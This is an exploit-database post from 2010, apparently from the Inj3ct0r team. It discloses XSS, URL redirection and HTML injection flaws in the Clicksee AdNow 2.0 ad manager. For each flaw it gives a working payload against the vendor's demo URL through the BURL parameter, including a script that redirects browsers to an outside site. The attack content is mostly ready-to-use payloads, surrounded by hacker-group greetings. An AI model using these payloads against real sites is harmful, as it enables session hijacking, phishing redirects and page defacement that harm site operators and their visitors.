Clicksee AdNow Multiple Vulnerability
Posted on 12 August 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Clicksee AdNow Multiple Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================== Clicksee AdNow Multiple Vulnerability ===================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################### 1 0 I'm L0rd CrusAd3r member from Inj3ct0r Team 1 1 ########################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com] Exploit Title:Clicksee AdNow Multiple Vulnerability Vendor url:http://www.clickseeadnow.com/ Version:2.0 Price:395$ Published: 2010-08-11 GThanx to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat, Sai, KD, M4n0j, The_Exploited, SeeMe, gunslinger_, Th3 RDX. Greetz to : Inj3ct0r Exploit DataBase (inj3ct0r.com) , 0xr00t.com , members and my friends :) etc.... Special Greetz: Topsecure.net, inj3ct0r Team ,Andhrahackers.com Shoutzz:- To all ICW & Inj3ct0r members. ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~ Description: It offers rich features for you to manage your web advertisements. The software was totally written in ASP and can run on MS Access and MS SQL database. It has been tested on a busy web site before it was released to the market. Code: ASP 2.0 & VBScript ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~ Vulnerability: **XSS Vulnerability** DEMO URL : Parameter:'"--><script>alert(0x000872)</script> http://www.clickseeadnow.com/demo/AdNow2/Admanager/company.asp?BURL=[xss] **URL Redirection Vulnerability** DEMO URL: Parameter:"><script type="text/javascript">window.location = "http://sonic.website.org"</script> http://www.clickseeadnow.com/demo/AdNow2/Admanager/company.asp?BURL=[url redirection] **HTML Injection** DEMO URL:">><marquee><h1>XSS3d By L0rd CrusAd3r</h1><marquee> Parameter: http://www.clickseeadnow.com/demo/AdNow2/Admanager/company.asp?BURL=[html] # 0day n0 m0re # # L0rd CrusAd3r # # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-12]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
